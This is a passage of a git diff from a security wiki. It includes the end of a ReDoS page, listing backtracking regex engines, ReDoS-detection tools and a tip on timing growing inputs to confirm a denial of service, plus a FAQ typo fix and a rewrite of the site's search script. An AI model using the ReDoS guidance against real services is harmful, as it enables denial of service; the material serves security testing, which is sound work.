`RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced. +- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking. +- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial. +- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines. + ## Tools - [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit) + - Find vulnerable regexes and auto‑generate evil inputs. 
Examples: + - `pip install regexploit` + - Analyze one pattern interactively: `regexploit` + - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/` - [https://devina.io/redos-checker](https://devina.io/redos-checker) +- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector) + - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases. +- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector) + - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe. + +> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS. ## References -- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) +- [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) - [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) -- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) +- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) - [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869) +- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) β€” [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618) +- Why RE2 (linear‑time regex engine) β€” [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index dd6a54063..8c4e6faf8 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I a page of HackTricks?** +> - **How can I reference a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: diff --git a/theme/ht_searcher.js b/theme/ht_searcher.js index 6b105f263..9548e9173 100644 --- a/theme/ht_searcher.js +++ b/theme/ht_searcher.js @@ -6,34 +6,63 @@ */ (() => { - "use strict"; + "use strict"; + + /* ───────────── 0. helpers (main thread) ───────────── */ + const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; + + /* ───────────── 1. 
Web‑Worker code ─────────────────── */ + const workerCode = ` + self.window = self; + self.search = self.search || {}; + const abs = p => location.origin + p; + + /* 1 β€” elasticlunr */ + try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } + catch { importScripts(abs('/elasticlunr.min.js')); } + + /* 2 β€” decompress gzip data */ + async function decompressGzip(arrayBuffer){ + if(typeof DecompressionStream !== 'undefined'){ + /* Modern browsers: use native DecompressionStream */ + const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip')); + const decompressed = await new Response(stream).arrayBuffer(); + return new TextDecoder().decode(decompressed); + } else { + /* Fallback: use pako library */ + if(typeof pako === 'undefined'){ + try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); } + catch(e){ throw new Error('pako library required for decompression: '+e); } + } + const uint8Array = new Uint8Array(arrayBuffer); + const decompressed = pako.ungzip(uint8Array, {to: 'string'}); + return decompressed; + } + } - /* ───────────── 0. helpers (main thread) ───────────── */ - const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); }; - - /* ───────────── 1. Web‑Worker code ─────────────────── */ - const workerCode = ` - self.window = self; - self.search = self.search || {}; - const abs = p => location.origin + p; - - /* 1 β€” elasticlunr */ - try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); } - catch { importScripts(abs('/elasticlunr.min.js')); } - - /* 2 β€” load a single index (remote β†’ local) */ + /* 3 β€” load a single index (remote β†’ local) */ async function loadIndex(remote, local, isCloud=false){ let rawLoaded = false; if(remote){ + /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */ try { const r = await fetch(remote,{mode:'cors'}); - if (!r.ok) throw new Error('HTTP '+r.status); - importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'}))); - rawLoaded = true; - } catch(e){ console.warn('remote',remote,'failed β†’',e); } + if (r.ok) { + const compressed = await r.arrayBuffer(); + const text = await decompressGzip(compressed); + importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'}))); + rawLoaded = true; + console.log('Loaded compressed from GitHub:',remote); + } + } catch(e){ console.warn('compressed GitHub',remote,'failed β†’',e); } } + /* If remote (GitHub) failed, fall back to local uncompressed file */ if(!rawLoaded && local){ - try { importScripts(abs(local)); rawLoaded = true; } + try { + importScripts(abs(local)); + rawLoaded = true; + console.log('Loaded local fallback:',local); + } catch(e){ console.error('local',local,'failed β†’',e); } } if(!rawLoaded) return null; /* give up on this index */ @@ -61,151 +90,159 @@ return local ? 
loadIndex(null, local, isCloud) : null; } + + let built = []; + const MAX = 30, opts = {bool:'AND', expand:true}; + + self.onmessage = async ({data}) => { + if(data.type === 'init'){ + const lang = data.lang || 'en'; + const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master'; - (async () => { - const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); - const lang = htmlLang.split('-')[0]; - const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download'; - const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download'; + /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */ + const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz'])); + const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz'])); - const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master'])); - const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master'])); + const MAIN_REMOTE_SOURCES = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); + const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; }); - const MAIN_REMOTE_SOURCES = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`); - const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`); - - const indices = []; - const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js', false); if(main) indices.push(main); - const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js', true ); if(cloud) indices.push(cloud); - - if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } - - /* build index objects */ - const built = indices.map(d => ({ - idx : elasticlunr.Index.load(d.json), - urls: d.urls, - cloud: d.cloud, - base: d.cloud ? 'https://cloud.hacktricks.wiki/' : '' - })); - - postMessage({ready:true}); - const MAX = 30, opts = {bool:'AND', expand:true}; - - self.onmessage = ({data:q}) => { - if(!q){ postMessage([]); return; } - - const all = []; - for(const s of built){ - const res = s.idx.search(q,opts); - if(!res.length) continue; - const max = res[0].score || 1; - res.forEach(r => { - const doc = s.idx.documentStore.getDoc(r.ref); - all.push({ - norm : r.score / max, - title: doc.title, - body : doc.body, - breadcrumbs: doc.breadcrumbs, - url : s.base + s.urls[r.ref], - cloud: s.cloud + const indices = []; + const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js', false); if(main) indices.push(main); + const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js', true ); if(cloud) indices.push(cloud); + if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } + + /* build index objects */ + built = indices.map(d => ({ + idx : elasticlunr.Index.load(d.json), + urls: d.urls, + cloud: d.cloud, + base: d.cloud ? 
'https://cloud.hacktricks.wiki/' : '' + })); + + postMessage({ready:true}); + return; + } + + const q = data.query || data; + if(!q){ postMessage([]); return; } + + const all = []; + for(const s of built){ + const res = s.idx.search(q,opts); + if(!res.length) continue; + const max = res[0].score || 1; + res.forEach(r => { + const doc = s.idx.documentStore.getDoc(r.ref); + all.push({ + norm : r.score / max, + title: doc.title, + body : doc.body, + breadcrumbs: doc.breadcrumbs, + url : s.base + s.urls[r.ref], + cloud: s.cloud + }); }); - }); - } - all.sort((a,b)=>b.norm-a.norm); - postMessage(all.slice(0,MAX)); - }; - })(); - `; + } + all.sort((a,b)=>b.norm-a.norm); + postMessage(all.slice(0,MAX)); + }; + `; + + /* ───────────── 2. spawn worker ───────────── */ + const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); + + /* ───────────── 2.1. initialize worker with language ───────────── */ + const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); + const lang = htmlLang.split('-')[0]; + worker.postMessage({type: 'init', lang: lang}); + + /* ───────────── 3. DOM refs ─────────────── */ + const wrap = document.getElementById('search-wrapper'); + const bar = document.getElementById('searchbar'); + const list = document.getElementById('searchresults'); + const listOut = document.getElementById('searchresults-outer'); + const header = document.getElementById('searchresults-header'); + const icon = document.getElementById('search-toggle'); + + const READY_ICON = icon.innerHTML; + icon.textContent = '⏳'; + icon.setAttribute('aria-label','Loading search …'); + icon.setAttribute('title','Search is loading, please wait...'); - /* ───────────── 2. spawn worker ───────────── */ - const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); - - /* ───────────── 3. DOM refs ─────────────── */ - const wrap = document.getElementById('search-wrapper'); - const bar = document.getElementById('searchbar'); - const list = document.getElementById('searchresults'); - const listOut = document.getElementById('searchresults-outer'); - const header = document.getElementById('searchresults-header'); - const icon = document.getElementById('search-toggle'); - - const READY_ICON = icon.innerHTML; - icon.textContent = '⏳'; - icon.setAttribute('aria-label','Loading search …'); - icon.setAttribute('title','Search is loading, please wait...'); - - const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; - let debounce, teaserCount=0; - - /* ───────────── helpers (teaser, metric) ───────────── */ - const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); - const URL_MARK='highlight'; - function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} - - function makeTeaser(body,terms){ - const stem=w=>elasticlunr.stemmer(w.toLowerCase()); - const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; - const W=[],sents=body.toLowerCase().split('. 
'); - let i=0,v=W_F,found=false; - sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); - if(!W.length) return body; - const win=Math.min(W.length,WIN); - const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; - for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; - const best=found?sums.lastIndexOf(Math.max(...sums)):0; - const out=[]; i=W[best][2]; - for(let k=best;k'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push(''); i=pos+w.length;} - return out.join(''); - } - - function format(d,terms){ - const teaser=makeTeaser(escapeHTML(d.body),terms); - teaserCount++; - const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); - const parts=d.url.split('#'); if(parts.length===1) parts.push(''); - const abs=d.url.startsWith('http'); - const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; - const style=d.cloud?" style=\"color:#1e88e5\"":""; - const isCloud=d.cloud?" [Cloud]":" [Book]"; - return ``+ - `${d.breadcrumbs}${isCloud}${teaser}`; - } - - /* ───────────── UI control ───────────── */ - function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} - function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} - - icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); - - document.addEventListener('keydown',e=>{ - if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; - const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); - if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} - else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} - else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} - }); - - bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); }); - - /* ───────────── worker messages ───────────── */ - worker.onmessage = ({data}) => { - if(data && data.ready!==undefined){ - if(data.ready){ - icon.innerHTML=READY_ICON; - icon.setAttribute('aria-label','Open search (S)'); - icon.removeAttribute('title'); - } - else { - icon.textContent='❌'; - icon.setAttribute('aria-label','Search unavailable'); - icon.setAttribute('title','Search is unavailable'); - } - return; + + const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; + let debounce, teaserCount=0; + + /* ───────────── helpers (teaser, metric) ───────────── */ + const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); + const URL_MARK='highlight'; + function metric(c,t){return c?`${c} 
search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} + + function makeTeaser(body,terms){ + const stem=w=>elasticlunr.stemmer(w.toLowerCase()); + const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; + const W=[],sents=body.toLowerCase().split('. '); + let i=0,v=W_F,found=false; + sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); + if(!W.length) return body; + const win=Math.min(W.length,WIN); + const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; + for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; + const best=found?sums.lastIndexOf(Math.max(...sums)):0; + const out=[]; i=W[best][2]; + for(let k=best;k'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push(''); i=pos+w.length;} + return out.join(''); } - const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); - header.textContent=metric(docs.length,q); - clear(list); - docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); - listOut.classList.toggle('hidden',!docs.length); - }; -})(); - + + function format(d,terms){ + const teaser=makeTeaser(escapeHTML(d.body),terms); + teaserCount++; + const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); + const parts=d.url.split('#'); if(parts.length===1) parts.push(''); + const abs=d.url.startsWith('http'); + const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; + const style=d.cloud?" style=\"color:#1e88e5\"":""; + const isCloud=d.cloud?" [Cloud]":" [Book]"; + return ``+ + `${d.breadcrumbs}${isCloud}${teaser}`; + } + + /* ───────────── UI control ───────────── */ + function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} + function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} + + icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); + + document.addEventListener('keydown',e=>{ + if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; + const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); + if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} + else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} + else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} + }); + + bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); }); + + /* ───────────── worker messages ───────────── */ + worker.onmessage = ({data}) => { + if(data && data.ready!==undefined){ + if(data.ready){ + icon.innerHTML=READY_ICON; + 
icon.setAttribute('aria-label','Open search (S)'); + icon.removeAttribute('title'); + } + else { + icon.textContent='❌'; + icon.setAttribute('aria-label','Search unavailable'); + icon.setAttribute('title','Search is unavailable'); + } + return; + } + const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); + header.textContent=metric(docs.length,q); + clear(list); + docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); + listOut.classList.toggle('hidden',!docs.length); + }; + })(); + \ No newline at end of file